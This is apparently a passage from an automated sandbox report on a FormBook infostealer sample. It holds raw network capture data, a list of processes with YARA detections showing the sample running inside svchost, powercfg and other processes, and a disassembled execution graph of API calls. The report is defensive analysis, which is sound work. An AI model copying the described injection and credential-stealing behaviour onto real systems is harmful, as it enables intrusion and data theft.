                                                  Data Ascii: SPEP9kjxD/ZI8Q/2aTEf9mkg7wYIgLLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABmkwxVZZAO42eTEf9mkg//ZpEP/2eUEf9mkhDkY40FWgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGCDAB1jjwxpY44MyGOPDMtikAxqXYgRHgAAAAAAAAAAAAAAAAAAAAAAAAAA5+cAAMGDAADxjwAA+B8AAMADA
                                                  Jan 10, 2025 20:11:51.267929077 CET1236INData Raw: 4e 65 74 76 65 33 68 47 48 4c 64 55 38 37 32 37 76 38 76 35 72 47 78 65 58 62 68 67 4d 4f 4d 62 53 59 77 67 51 6b 77 49 47 41 51 30 41 51 70 74 30 53 72 75 39 56 71 68 52 61 53 48 49 6a 58 33 37 44 33 57 76 67 68 68 41 44 43 2b 41 6b 7a 36 36 62
                                                  Data Ascii: Netve3hGHLdU8727v8v5rGxeXbhgMOMbSYwgQkwIGAQ0AQpt0Sru9VqhRaSHIjX37D3WvghhADC+Akz66b2f+/U/o7tLMy1No8LyAE8KVFmNLJlR3WdjdqqZZ/j7vqB3P5J2z+mYIE2dpLyUgAFD4A+31NpuR/tJc3/BpRBSpzajq23Rjo0mv91at9NuOey3ajptsitpUBqcUnpMsigIJAfCBN73LJdpisBoNC2NvDQSfkgJPE3
                                                  Jan 10, 2025 20:11:51.267947912 CET1236INData Raw: 6c 4c 72 6e 4e 59 65 62 34 56 66 41 50 71 74 6f 44 42 32 48 71 31 32 62 4b 2f 4c 74 65 61 55 57 6a 55 7a 6b 72 79 72 74 61 38 56 2f 39 53 47 45 6e 59 76 38 4f 50 51 55 42 36 49 47 69 48 68 65 66 4b 6d 2b 37 43 37 4a 78 4d 59 59 49 35 62 6c 4f 55
                                                  Data Ascii: lLrnNYeb4VfAPqtoDB2Hq12bK/LteaUWjUzkryrta8V/9SGEnYv8OPQUB6IGiHhefKm+7C7JxMYYI5blOUj66IuwFSC///2vrPv3p3SaF0hJMJFSiTc+ZO31pz0oRZVumx9iEJiLHFYlG1OdCGrRBmEUcD//99reva596W8Tz9IwRAHqHaKDWhpQBVplg/BCAyB7cDGsOuVp0Wa2K4C9uDfdiD/4bfpwGyjbtRlAVuiRQL//5yv
                                                  Jan 10, 2025 20:11:51.273885965 CET1236INData Raw: 70 47 57 6a 4b 79 63 76 49 4c 31 74 46 48 62 6c 68 31 37 58 35 77 76 55 58 76 6a 5a 6e 38 67 46 71 72 32 74 77 72 44 5a 6f 72 4f 72 6d 6b 48 73 59 4b 42 51 47 46 77 52 4b 48 68 57 4e 49 53 30 6f 6f 31 47 37 62 73 6c 44 31 4b 35 56 56 38 30 6f 31
                                                  Data Ascii: pGWjKycvIL1tFHblh17X5wvUXvjZn8gFqr2twrDZorOrmkHsYKBQGFwRKHhWNIS0oo1G7bslD1K5VV80o1KxWk4j+ZYZLNaGW0lhVWXSqMzmCw2h8sTCEViycf6d5C9WFNYBZIBioEf/Wtsj3lxi8LzExRVRa3UR+KpvpsUAfUYmCa4PnaArJmDqIbiFI5IJ0+XdJdeDJfgU/pwD0fC/usmPrdHvBMSkZKRU9RBz9KLGBiZmFlY


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:14:09:43
                                                  Start date:10/01/2025
                                                  Path:C:\Users\user\Desktop\wWXR5js3k2.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\wWXR5js3k2.exe"
                                                  Imagebase:0x650000
                                                  File size:1'326'080 bytes
                                                  MD5 hash:9D8150F9B27A2A93925717D361ADD951
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:2
                                                  Start time:14:09:44
                                                  Start date:10/01/2025
                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\wWXR5js3k2.exe"
                                                  Imagebase:0x3d0000
                                                  File size:46'504 bytes
                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1886277798.0000000002600000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1887212251.0000000004E10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1886979901.0000000003390000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:4
                                                  Start time:14:10:28
                                                  Start date:10/01/2025
                                                  Path:C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe"
                                                  Imagebase:0x410000
                                                  File size:140'800 bytes
                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2613432274.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:5
                                                  Start time:14:10:29
                                                  Start date:10/01/2025
                                                  Path:C:\Windows\SysWOW64\powercfg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\SysWOW64\powercfg.exe"
                                                  Imagebase:0x730000
                                                  File size:78'336 bytes
                                                  MD5 hash:9D71DBDD3AD017EC69554ACF9CAADD05
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2613375030.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2613433985.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2610818121.0000000002A60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation:moderate
                                                  Has exited:false

                                                  General

                                                  Target ID:8
                                                  Start time:14:10:43
                                                  Start date:10/01/2025
                                                  Path:C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe"
                                                  Imagebase:0x410000
                                                  File size:140'800 bytes
                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2615837301.0000000005650000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:10
                                                  Start time:14:10:55
                                                  Start date:10/01/2025
                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                  Imagebase:0x7ff73feb0000
                                                  File size:676'768 bytes
                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:3.9%
                                                    Dynamic/Decrypted Code Coverage:0.4%
                                                    Signature Coverage:3.3%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:170
                                                    execution_graph 101061 651055 101066 652649 101061->101066 101076 657667 101066->101076 101070 652754 101072 65105a 101070->101072 101084 653416 59 API calls 2 library calls 101070->101084 101073 672d40 101072->101073 101130 672c44 101073->101130 101075 651064 101085 670db6 101076->101085 101078 657688 101079 670db6 Mailbox 59 API calls 101078->101079 101080 6526b7 101079->101080 101081 653582 101080->101081 101123 6535b0 101081->101123 101084->101070 101087 670dbe 101085->101087 101088 670dd8 101087->101088 101090 670ddc std::exception::exception 101087->101090 101095 67571c 101087->101095 101112 6733a1 DecodePointer 101087->101112 101088->101078 101113 67859b RaiseException 101090->101113 101092 670e06 101114 6784d1 58 API calls _free 101092->101114 101094 670e18 101094->101078 101096 675797 101095->101096 101100 675728 101095->101100 101121 6733a1 DecodePointer 101096->101121 101098 67579d 101122 678b28 58 API calls __getptd_noexit 101098->101122 101099 675733 101099->101100 101115 67a16b 58 API calls 2 library calls 101099->101115 101116 67a1c8 58 API calls 8 library calls 101099->101116 101117 67309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101099->101117 101100->101099 101103 67575b RtlAllocateHeap 101100->101103 101106 675783 101100->101106 101110 675781 101100->101110 101118 6733a1 DecodePointer 101100->101118 101103->101100 101104 67578f 101103->101104 101104->101087 101119 678b28 58 API calls __getptd_noexit 101106->101119 101120 678b28 58 API calls __getptd_noexit 101110->101120 101112->101087 101113->101092 101114->101094 101115->101099 101116->101099 101118->101100 101119->101110 101120->101104 101121->101098 101122->101104 101124 6535bd 101123->101124 101125 6535a1 101123->101125 101124->101125 101126 6535c4 RegOpenKeyExW 101124->101126 101125->101070 101126->101125 101127 6535de RegQueryValueExW 101126->101127 101128 653614 RegCloseKey 101127->101128 101129 6535ff 101127->101129 101128->101125 101129->101128 101131 672c50 _wprintf 101130->101131 101138 673217 101131->101138 101137 672c77 _wprintf 101137->101075 101155 679c0b 101138->101155 101140 672c59 101141 672c88 DecodePointer DecodePointer 101140->101141 101142 672c65 101141->101142 101143 672cb5 101141->101143 101152 672c82 101142->101152 101143->101142 101201 6787a4 59 API calls _wprintf 101143->101201 101145 672d18 EncodePointer EncodePointer 101145->101142 101146 672cc7 101146->101145 101147 672cec 101146->101147 101202 678864 61 API calls 2 library calls 101146->101202 101147->101142 101150 672d06 EncodePointer 101147->101150 101203 678864 61 API calls 2 library calls 101147->101203 101150->101145 101151 672d00 101151->101142 101151->101150 101204 673220 101152->101204 101156 679c2f EnterCriticalSection 101155->101156 101157 679c1c 101155->101157 101156->101140 101162 679c93 101157->101162 101159 679c22 101159->101156 101186 6730b5 58 API calls 3 library calls 101159->101186 101163 679c9f _wprintf 101162->101163 101164 679ca8 101163->101164 101166 679cc0 101163->101166 101187 67a16b 58 API calls 2 library calls 101164->101187 101173 679ce1 _wprintf 101166->101173 101190 67881d 58 API calls __malloc_crt 101166->101190 101168 679cad 101188 67a1c8 58 API calls 8 library calls 101168->101188 101169 679cd5 101171 679cdc 101169->101171 101172 679ceb 101169->101172 101191 678b28 58 API calls __getptd_noexit 101171->101191 101176 679c0b __lock 58 API calls 101172->101176 101173->101159 101174 679cb4 101189 67309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101174->101189 101178 679cf2 101176->101178 101180 679d17 101178->101180 101181 679cff 101178->101181 101193 672d55 101180->101193 101192 679e2b InitializeCriticalSectionAndSpinCount 101181->101192 101184 679d0b 101199 679d33 LeaveCriticalSection _doexit 101184->101199 101187->101168 101188->101174 101190->101169 101191->101173 101192->101184 101194 672d5e RtlFreeHeap 101193->101194 101195 672d87 __dosmaperr 101193->101195 101194->101195 101196 672d73 101194->101196 101195->101184 101200 678b28 58 API calls __getptd_noexit 101196->101200 101198 672d79 GetLastError 101198->101195 101199->101173 101200->101198 101201->101146 101202->101147 101203->101151 101207 679d75 LeaveCriticalSection 101204->101207 101206 672c87 101206->101137 101207->101206 101208 677c56 101209 677c62 _wprintf 101208->101209 101245 679e08 GetStartupInfoW 101209->101245 101211 677c67 101247 678b7c GetProcessHeap 101211->101247 101213 677cbf 101214 677cca 101213->101214 101330 677da6 58 API calls 3 library calls 101213->101330 101248 679ae6 101214->101248 101217 677cd0 101218 677cdb __RTC_Initialize 101217->101218 101331 677da6 58 API calls 3 library calls 101217->101331 101269 67d5d2 101218->101269 101221 677cea 101222 677cf6 GetCommandLineW 101221->101222 101332 677da6 58 API calls 3 library calls 101221->101332 101288 684f23 GetEnvironmentStringsW 101222->101288 101226 677cf5 101226->101222 101228 677d10 101229 677d1b 101228->101229 101333 6730b5 58 API calls 3 library calls 101228->101333 101298 684d58 101229->101298 101232 677d21 101233 677d2c 101232->101233 101334 6730b5 58 API calls 3 library calls 101232->101334 101312 6730ef 101233->101312 101236 677d34 101237 677d3f __wwincmdln 101236->101237 101335 6730b5 58 API calls 3 library calls 101236->101335 101318 6547d0 101237->101318 101240 677d53 101241 677d62 101240->101241 101336 673358 58 API calls _doexit 101240->101336 101337 6730e0 58 API calls _doexit 101241->101337 101244 677d67 _wprintf 101246 679e1e 101245->101246 101246->101211 101247->101213 101338 673187 36 API calls 2 library calls 101248->101338 101250 679aeb 101339 679d3c InitializeCriticalSectionAndSpinCount __mtinitlocks 101250->101339 101252 679af0 101253 679af4 101252->101253 101341 679d8a TlsAlloc 101252->101341 101340 679b5c 61 API calls 2 library calls 101253->101340 101256 679af9 101256->101217 101257 679b06 101257->101253 101258 679b11 101257->101258 101342 6787d5 101258->101342 101261 679b53 101350 679b5c 61 API calls 2 library calls 101261->101350 101264 679b32 101264->101261 101266 679b38 101264->101266 101265 679b58 101265->101217 101349 679a33 58 API calls 4 library calls 101266->101349 101268 679b40 GetCurrentThreadId 101268->101217 101270 67d5de _wprintf 101269->101270 101271 679c0b __lock 58 API calls 101270->101271 101272 67d5e5 101271->101272 101273 6787d5 __calloc_crt 58 API calls 101272->101273 101275 67d5f6 101273->101275 101274 67d661 GetStartupInfoW 101282 67d676 101274->101282 101285 67d7a5 101274->101285 101275->101274 101276 67d601 _wprintf @_EH4_CallFilterFunc@8 101275->101276 101276->101221 101277 67d86d 101364 67d87d LeaveCriticalSection _doexit 101277->101364 101279 6787d5 __calloc_crt 58 API calls 101279->101282 101280 67d7f2 GetStdHandle 101280->101285 101281 67d805 GetFileType 101281->101285 101282->101279 101283 67d6c4 101282->101283 101282->101285 101284 67d6f8 GetFileType 101283->101284 101283->101285 101362 679e2b InitializeCriticalSectionAndSpinCount 101283->101362 101284->101283 101285->101277 101285->101280 101285->101281 101363 679e2b InitializeCriticalSectionAndSpinCount 101285->101363 101289 677d06 101288->101289 101290 684f34 101288->101290 101294 684b1b GetModuleFileNameW 101289->101294 101365 67881d 58 API calls __malloc_crt 101290->101365 101292 684f70 FreeEnvironmentStringsW 101292->101289 101293 684f5a _memmove 101293->101292 101296 684b4f _wparse_cmdline 101294->101296 101295 684b8f _wparse_cmdline 101295->101228 101296->101295 101366 67881d 58 API calls __malloc_crt 101296->101366 101299 684d71 __wsetenvp 101298->101299 101303 684d69 101298->101303 101300 6787d5 __calloc_crt 58 API calls 101299->101300 101308 684d9a __wsetenvp 101300->101308 101301 684df1 101302 672d55 _free 58 API calls 101301->101302 101302->101303 101303->101232 101304 6787d5 __calloc_crt 58 API calls 101304->101308 101305 684e16 101306 672d55 _free 58 API calls 101305->101306 101306->101303 101308->101301 101308->101303 101308->101304 101308->101305 101309 684e2d 101308->101309 101367 684607 58 API calls _wprintf 101308->101367 101368 678dc6 IsProcessorFeaturePresent 101309->101368 101311 684e39 101311->101232 101313 6730fb __IsNonwritableInCurrentImage 101312->101313 101391 67a4d1 101313->101391 101315 673119 __initterm_e 101316 672d40 __cinit 67 API calls 101315->101316 101317 673138 __cinit __IsNonwritableInCurrentImage 101315->101317 101316->101317 101317->101236 101319 6547ea 101318->101319 101329 654889 101318->101329 101320 654824 IsThemeActive 101319->101320 101394 67336c 101320->101394 101324 654850 101406 6548fd SystemParametersInfoW SystemParametersInfoW 101324->101406 101326 65485c 101407 653b3a 101326->101407 101328 654864 SystemParametersInfoW 101328->101329 101329->101240 101330->101214 101331->101218 101332->101226 101336->101241 101337->101244 101338->101250 101339->101252 101340->101256 101341->101257 101344 6787dc 101342->101344 101345 678817 101344->101345 101347 6787fa 101344->101347 101351 6851f6 101344->101351 101345->101261 101348 679de6 TlsSetValue 101345->101348 101347->101344 101347->101345 101359 67a132 Sleep 101347->101359 101348->101264 101349->101268 101350->101265 101352 685201 101351->101352 101357 68521c 101351->101357 101353 68520d 101352->101353 101352->101357 101360 678b28 58 API calls __getptd_noexit 101353->101360 101355 68522c HeapAlloc 101356 685212 101355->101356 101355->101357 101356->101344 101357->101355 101357->101356 101361 6733a1 DecodePointer 101357->101361 101359->101347 101360->101356 101361->101357 101362->101283 101363->101285 101364->101276 101365->101293 101366->101295 101367->101308 101369 678dd1 101368->101369 101374 678c59 101369->101374 101373 678dec 101373->101311 101375 678c73 _memset ___raise_securityfailure 101374->101375 101376 678c93 IsDebuggerPresent 101375->101376 101382 67a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 101376->101382 101379 678d57 ___raise_securityfailure 101383 67c5f6 101379->101383 101380 678d7a 101381 67a140 GetCurrentProcess TerminateProcess 101380->101381 101381->101373 101382->101379 101384 67c600 IsProcessorFeaturePresent 101383->101384 101385 67c5fe 101383->101385 101387 68590a 101384->101387 101385->101380 101390 6858b9 5 API calls ___raise_securityfailure 101387->101390 101389 6859ed 101389->101380 101390->101389 101392 67a4d4 EncodePointer 101391->101392 101392->101392 101393 67a4ee 101392->101393 101393->101315 101395 679c0b __lock 58 API calls 101394->101395 101396 673377 DecodePointer EncodePointer 101395->101396 101459 679d75 LeaveCriticalSection 101396->101459 101398 654849 101399 6733d4 101398->101399 101400 6733de 101399->101400 101401 6733f8 101399->101401 101400->101401 101460 678b28 58 API calls __getptd_noexit 101400->101460 101401->101324 101403 6733e8 101461 678db6 9 API calls _wprintf 101403->101461 101405 6733f3 101405->101324 101406->101326 101408 653b47 __write_nolock 101407->101408 101409 657667 59 API calls 101408->101409 101410 653b51 GetCurrentDirectoryW 101409->101410 101462 653766 101410->101462 101412 653b7a IsDebuggerPresent 101413 68d272 MessageBoxA 101412->101413 101414 653b88 101412->101414 101416 68d28c 101413->101416 101414->101416 101417 653ba5 101414->101417 101446 653c61 101414->101446 101415 653c68 SetCurrentDirectoryW 101418 653c75 Mailbox 101415->101418 101681 657213 59 API calls Mailbox 101416->101681 101543 657285 101417->101543 101418->101328 101421 68d29c 101426 68d2b2 SetCurrentDirectoryW 101421->101426 101423 653bc3 GetFullPathNameW 101559 657bcc 101423->101559 101425 653bfe 101568 66092d 101425->101568 101426->101418 101429 653c1c 101430 653c26 101429->101430 101682 6a874b AllocateAndInitializeSid CheckTokenMembership FreeSid 101429->101682 101584 653a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 101430->101584 101433 68d2cf 101433->101430 101436 68d2e0 101433->101436 101683 654706 101436->101683 101437 653c30 101439 653c43 101437->101439 101592 65434a 101437->101592 101603 6609d0 101439->101603 101440 68d2e8 101690 657de1 101440->101690 101444 653c4e 101444->101446 101446->101415 101459->101398 101460->101403 101461->101405 101463 657667 59 API calls 101462->101463 101464 65377c 101463->101464 101710 653d31 101464->101710 101466 65379a 101467 654706 61 API calls 101466->101467 101468 6537ae 101467->101468 101469 657de1 59 API calls 101468->101469 101470 6537bb 101469->101470 101724 654ddd 101470->101724 101473 6537dc Mailbox 101748 658047 101473->101748 101474 68d173 101795 6b955b 101474->101795 101477 68d192 101481 672d55 _free 58 API calls 101477->101481 101482 68d19f 101481->101482 101484 654e4a 84 API calls 101482->101484 101486 68d1a8 101484->101486 101490 653ed0 59 API calls 101486->101490 101487 657de1 59 API calls 101488 653808 101487->101488 101755 6584c0 101488->101755 101492 68d1c3 101490->101492 101491 65381a Mailbox 101493 657de1 59 API calls 101491->101493 101494 653ed0 59 API calls 101492->101494 101495 653840 101493->101495 101496 68d1df 101494->101496 101497 6584c0 69 API calls 101495->101497 101498 654706 61 API calls 101496->101498 101500 65384f Mailbox 101497->101500 101499 68d204 101498->101499 101501 653ed0 59 API calls 101499->101501 101503 657667 59 API calls 101500->101503 101502 68d210 101501->101502 101504 658047 59 API calls 101502->101504 101505 65386d 101503->101505 101506 68d21e 101504->101506 101759 653ed0 101505->101759 101508 653ed0 59 API calls 101506->101508 101510 68d22d 101508->101510 101516 658047 59 API calls 101510->101516 101512 653887 101512->101486 101513 653891 101512->101513 101514 672efd _W_store_winword 60 API calls 101513->101514 101515 65389c 101514->101515 101515->101492 101517 6538a6 101515->101517 101518 68d24f 101516->101518 101519 672efd _W_store_winword 60 API calls 101517->101519 101520 653ed0 59 API calls 101518->101520 101521 6538b1 101519->101521 101522 68d25c 101520->101522 101521->101496 101523 6538bb 101521->101523 101522->101522 101524 672efd _W_store_winword 60 API calls 101523->101524 101525 6538c6 101524->101525 101525->101510 101526 653907 101525->101526 101528 653ed0 59 API calls 101525->101528 101526->101510 101527 653914 101526->101527 101775 6592ce 101527->101775 101529 6538ea 101528->101529 101531 658047 59 API calls 101529->101531 101533 6538f8 101531->101533 101535 653ed0 59 API calls 101533->101535 101535->101526 101538 65928a 59 API calls 101540 65394f 101538->101540 101539 658ee0 60 API calls 101539->101540 101540->101538 101540->101539 101541 653ed0 59 API calls 101540->101541 101542 653995 Mailbox 101540->101542 101541->101540 101542->101412 101544 657292 __write_nolock 101543->101544 101545 68ea22 _memset 101544->101545 101546 6572ab 101544->101546 101549 68ea3e GetOpenFileNameW 101545->101549 102590 654750 101546->102590 101551 68ea8d 101549->101551 101552 657bcc 59 API calls 101551->101552 101554 68eaa2 101552->101554 101554->101554 101556 6572c9 102618 65686a 101556->102618 101560 657c45 101559->101560 101562 657bd8 __wsetenvp 101559->101562 101561 657d2c 59 API calls 101560->101561 101567 657bf6 _memmove 101561->101567 101563 657c13 101562->101563 101564 657bee 101562->101564 101565 658029 59 API calls 101563->101565 102955 657f27 59 API calls Mailbox 101564->102955 101565->101567 101567->101425 101569 66093a __write_nolock 101568->101569 102956 656d80 101569->102956 101571 66093f 101583 653c14 101571->101583 102967 66119e 89 API calls 101571->102967 101573 66094c 101573->101583 102968 663ee7 91 API calls Mailbox 101573->102968 101575 660955 101576 660959 GetFullPathNameW 101575->101576 101575->101583 101577 657bcc 59 API calls 101576->101577 101578 660985 101577->101578 101579 657bcc 59 API calls 101578->101579 101580 660992 101579->101580 101581 694cab _wcscat 101580->101581 101582 657bcc 59 API calls 101580->101582 101582->101583 101583->101421 101583->101429 101585 653ab0 LoadImageW RegisterClassExW 101584->101585 101586 68d261 101584->101586 103006 653041 7 API calls 101585->103006 103007 6547a0 LoadImageW EnumResourceNamesW 101586->103007 101589 653b34 101591 6539d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 101589->101591 101590 68d26a 101591->101437 101593 654375 _memset 101592->101593 103008 654182 101593->103008 101596 6543fa 101604 694cc3 101603->101604 101618 6609f5 101603->101618 103096 6b9e4a 89 API calls 4 library calls 101604->103096 101611 660a4b PeekMessageW 101679 660a05 Mailbox 101611->101679 101615 694e81 Sleep 101615->101679 101617 660ce4 101618->101679 103097 659e5d 60 API calls 101618->103097 103098 6a6349 341 API calls 101618->103098 101622 660ea5 TranslateMessage DispatchMessageW 101623 660e43 PeekMessageW 101622->101623 101623->101679 101624 694d50 TranslateAcceleratorW 101624->101623 101624->101679 101625 660d13 timeGetTime 101625->101679 101626 69581f WaitForSingleObject 101626->101679 101629 660e5f Sleep 101662 660e70 Mailbox 101629->101662 101630 658047 59 API calls 101630->101679 101631 657667 59 API calls 101631->101662 101632 670db6 59 API calls Mailbox 101632->101679 101633 695af8 Sleep 101633->101662 101636 67049f timeGetTime 101636->101662 101637 660f4e timeGetTime 103095 659e5d 60 API calls 101637->103095 101641 695b8f GetExitCodeProcess 101646 6d5f25 110 API calls 101646->101662 101647 65b7dd 109 API calls 101647->101662 101648 659e5d 60 API calls 101648->101679 101649 695874 101663 660f95 101649->101663 101650 695c17 Sleep 101650->101679 101651 695078 Sleep 101651->101679 101653 657de1 59 API calls 101653->101662 101658 659ea0 314 API calls 101658->101679 101662->101631 101662->101636 101662->101641 101662->101646 101662->101647 101662->101649 101662->101650 101662->101651 101662->101653 101662->101663 101662->101679 101663->101444 101665 6b9e4a 89 API calls 101665->101679 101667 659c90 59 API calls Mailbox 101667->101679 101668 6584c0 69 API calls 101668->101679 101669 65b73c 314 API calls 101669->101679 101671 6a617e 59 API calls Mailbox 101671->101679 101672 6955d5 VariantClear 101672->101679 101673 658cd4 59 API calls Mailbox 101673->101679 101674 69566b VariantClear 101674->101679 101675 695419 VariantClear 101675->101679 101676 6a6e8f 59 API calls 101676->101679 101677 657de1 59 API calls 101677->101679 101678 6589b3 69 API calls 101678->101679 101679->101611 101679->101615 101679->101617 101679->101622 101679->101623 101679->101624 101679->101625 101679->101626 101679->101629 101679->101630 101679->101632 101679->101633 101679->101637 101679->101648 101679->101658 101679->101662 101679->101663 101679->101665 101679->101667 101679->101668 101679->101669 101679->101671 101679->101672 101679->101673 101679->101674 101679->101675 101679->101676 101679->101677 101679->101678 103035 65e420 101679->103035 103042 65e6a0 101679->103042 103073 65f460 101679->103073 103091 65fce0 341 API calls 2 library calls 101679->103091 103092 6531ce IsDialogMessageW GetClassLongW 101679->103092 103099 6d6018 59 API calls 101679->103099 103100 6b9a15 59 API calls Mailbox 101679->103100 103101 6ad4f2 59 API calls 101679->103101 103102 659837 101679->103102 103120 6a60ef 59 API calls 2 library calls 101679->103120 103121 658401 59 API calls 101679->103121 103122 6582df 59 API calls Mailbox 101679->103122 101681->101421 101682->101433 101684 681940 __write_nolock 101683->101684 101685 654713 GetModuleFileNameW 101684->101685 101686 657de1 59 API calls 101685->101686 101687 654739 101686->101687 101688 654750 60 API calls 101687->101688 101689 654743 Mailbox 101688->101689 101689->101440 101711 653d3e __write_nolock 101710->101711 101712 657bcc 59 API calls 101711->101712 101717 653ea4 Mailbox 101711->101717 101714 653d70 101712->101714 101723 653da6 Mailbox 101714->101723 101836 6579f2 101714->101836 101715 653e77 101716 657de1 59 API calls 101715->101716 101715->101717 101719 653e98 101716->101719 101717->101466 101718 657de1 59 API calls 101718->101723 101720 653f74 59 API calls 101719->101720 101720->101717 101721 6579f2 59 API calls 101721->101723 101723->101715 101723->101717 101723->101718 101723->101721 101839 653f74 101723->101839 101849 654bb5 101724->101849 101729 654e08 LoadLibraryExW 101859 654b6a 101729->101859 101730 68d8e6 101731 654e4a 84 API calls 101730->101731 101733 68d8ed 101731->101733 101735 654b6a 3 API calls 101733->101735 101737 68d8f5 101735->101737 101885 654f0b 101737->101885 101738 654e2f 101738->101737 101739 654e3b 101738->101739 101741 654e4a 84 API calls 101739->101741 101743 6537d4 101741->101743 101743->101473 101743->101474 101745 68d91c 101893 654ec7 101745->101893 101747 68d929 101749 658052 101748->101749 101750 6537ef 101748->101750 102323 657f77 59 API calls 2 library calls 101749->102323 101752 65928a 101750->101752 101753 670db6 Mailbox 59 API calls 101752->101753 101754 6537fb 101753->101754 101754->101487 101756 6584cb 101755->101756 101758 6584f2 101756->101758 102324 6589b3 69 API calls Mailbox 101756->102324 101758->101491 101760 653ef3 101759->101760 101761 653eda 101759->101761 101762 657bcc 59 API calls 101760->101762 101763 658047 59 API calls 101761->101763 101764 653879 101762->101764 101763->101764 101765 672efd 101764->101765 101766 672f7e 101765->101766 101767 672f09 101765->101767 102327 672f90 60 API calls 3 library calls 101766->102327 101774 672f2e 101767->101774 102325 678b28 58 API calls __getptd_noexit 101767->102325 101770 672f8b 101770->101512 101771 672f15 102326 678db6 9 API calls _wprintf 101771->102326 101773 672f20 101773->101512 101774->101512 101776 6592d6 101775->101776 101777 670db6 Mailbox 59 API calls 101776->101777 101778 6592e4 101777->101778 101779 653924 101778->101779 102328 6591fc 59 API calls Mailbox 101778->102328 101781 659050 101779->101781 102329 659160 101781->102329 101783 65905f 101784 670db6 Mailbox 59 API calls 101783->101784 101785 653932 101783->101785 101784->101785 101786 658ee0 101785->101786 101787 68f17c 101786->101787 101789 658ef7 101786->101789 101787->101789 102339 658bdb 59 API calls Mailbox 101787->102339 101790 659040 101789->101790 101791 658ff8 101789->101791 101794 658fff 101789->101794 102338 659d3c 60 API calls Mailbox 101790->102338 101793 670db6 Mailbox 59 API calls 101791->101793 101793->101794 101794->101540 101796 654ee5 85 API calls 101795->101796 101797 6b95ca 101796->101797 102340 6b9734 101797->102340 101800 654f0b 74 API calls 101801 6b95f7 101800->101801 101802 654f0b 74 API calls 101801->101802 101803 6b9607 101802->101803 101804 654f0b 74 API calls 101803->101804 101805 6b9622 101804->101805 101806 654f0b 74 API calls 101805->101806 101807 6b963d 101806->101807 101808 654ee5 85 API calls 101807->101808 101809 6b9654 101808->101809 101810 67571c __malloc_crt 58 API calls 